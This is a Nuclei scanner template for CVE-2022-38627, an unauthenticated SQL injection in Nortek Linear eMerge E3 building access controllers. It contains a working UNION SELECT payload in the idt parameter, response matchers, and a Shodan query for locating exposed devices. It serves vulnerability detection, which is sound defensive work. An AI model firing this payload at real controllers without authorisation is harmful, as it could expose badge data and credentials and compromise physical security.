id: CVE-2022-38627 info: name: Nortek Linear eMerge E3-Series - SQL Injection author: daffainfo,omarhashem666 severity: critical description: | Nortek Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e were discovered to contain a SQL injection vulnerability via the idt parameter. impact: | Unauthenticated attackers can exploit SQL injection in the idt parameter to extract sensitive access control data including badge information, user credentials, and building security configurations from the eMerge access control system. remediation: | Update Nortek Linear eMerge E3-Series firmware to a patched version that uses parameterized queries and properly sanitizes the idt parameter. reference: - https://github.com/omarhashem123/Security-Research/tree/main/CVE-2022-38627 - https://omar0x01.medium.com/15cebd072ed6 - https://nvd.nist.gov/vuln/detail/CVE-2022-38627 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-38627 epss-score: 0.0427 epss-percentile: 0.90051 cwe-id: CWE-89 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware shodan-query: - http.title:"Linear eMerge" tags: cve,cve2022,emerge,nortek,linear,sqli,vkev,vuln http: - method: GET path: - '{{BaseURL}}/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27{{randstr}}%27||%27CVE%27||(7*7*7*7)||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version' matchers-condition: and matchers: - type: regex part: body regex: - '{{randstr}}CVE24010\.[0-9]+-[0-9]+[a-z]+' - type: word part: body words: - "Print Badge" - "btnPrint" condition: and # digest: 4b0a00483046022100f10afb0e642d62c51d908df0c0ce3fac4f5034d2e7831117617271bb3dd11595022100a39ae0ba2d129c37c5da0357811b6e43ad24b6d89012c8e4e292fa12156880fe:922c64590222798bb761d5b6d8e72950